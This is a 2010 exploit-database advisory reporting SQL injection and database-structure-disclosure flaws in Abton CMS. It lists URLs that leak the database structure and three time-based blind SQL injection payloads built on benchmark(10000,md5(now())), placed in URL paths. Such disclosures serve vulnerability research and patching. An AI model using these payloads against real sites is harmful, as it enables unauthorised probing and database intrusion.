Abton CMS remote SQL injection vulnerability

2010-03-11T00:00:00
ID 1337DAY-ID-11268
Type zdt
Reporter MustLive
Modified 2010-03-11T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ============================================
Abton CMS remote SQL Injection vulnerability
============================================

-----------------------------
Details:

These are SQL DB Structure Extraction and SQL Injection vulnerabilities.

SQL DB Structure Extraction:

http://site/rus/details/13220/

http://site/rus/referaty/?/

http://site/rus/?/

http://site/rus/referaty/1/-1/

http://site/abton/

At the site on this engine there are many such vulnerabilities, which lead
to leakage of structure of DB.

SQL Injection:

http://site/rus/details/?+benchmark(10000,md5(now()))+?/

http://site/rus/referaty/1'+benchmark(10000,md5(now()))-?1/

http://site/rus/?+benchmark(10000,md5(now()))+?/

Vulnerable are all versions of Abton before the version where developers
fixed these holes.




#  0day.today [2018-03-28]  #